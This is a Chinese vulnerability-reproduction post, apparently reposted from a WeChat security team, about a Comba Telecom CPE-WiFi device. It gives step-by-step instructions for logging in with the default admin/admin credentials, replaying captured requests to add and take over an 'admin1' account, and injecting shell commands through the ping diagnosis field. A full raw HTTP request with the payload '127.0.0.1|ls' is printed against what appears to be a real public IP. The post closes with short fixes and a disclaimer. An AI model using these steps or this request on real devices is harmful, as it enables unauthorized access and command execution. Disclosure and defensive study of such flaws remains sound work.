导读
主要分享学习日常中的web渗透,内网渗透、漏洞复现、工具开发相关等。希望以技术共享、交流等不断赋能自己,为网络安全发展贡献自己的微薄之力!
京信通信系统中国有限公司CPE-WiFi存在任意用户添加&命令执行,攻击者可以通过此漏洞登录web管理界面或直接获取服务器权限,从而造成不良影响。
1、访问界面如下
2、存在弱口令admin/admin,成果登录界面如下。
3、点击系统维护-用户管理
4、手动添加用户,bP抓包,保存数据包
5、退成登录,清除缓存,利用此数据包添加一个admin1的账户
6、重新登录后查看添加admin1成功
7、直接界面修改此用户的密码为111111,BP抓包,保存数据包
8、退出登录,前台刷新数据,利用所得的数据包修改admin1密码为123456
9、利用admin1/123456登录成功
10、登录之后界面有一个诊断功能,经测试,未对用户输入的特殊字符进行过滤
11、通过BP抓取执行的包,退出登录或者重新换一个设备测试,仍然可以执行任意命令
POST /cgi-bin/jumpto.php?class=diagnosis&page=config_save&isphp=1 HTTP/1.1
Host: 124.152.120.247
Content-Length: 53
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://124.152.120.247
Referer: http://124.152.120.247/cgi-bin/jumpto.php?class=diagnosis&page=ping
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: timestamp=-1; cooLogin=1; cooUser=admin
Connection: close
call_function=ping&iface=eth0&hostname=127.0.0.1%7Cls
1、验证用户身份,确保只有经过身份验证的用户才能访问和执行添加操作。
2、实施细粒度的权限控制,限制对添加功能的访问
3、严格过滤用户输入的数据,禁止执行非预期系统命令!
原文始发于微信公众号(五六七安全团队):京信通信系统中国有限公司CPE-WiFi存在任意用户添加&命令执行
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论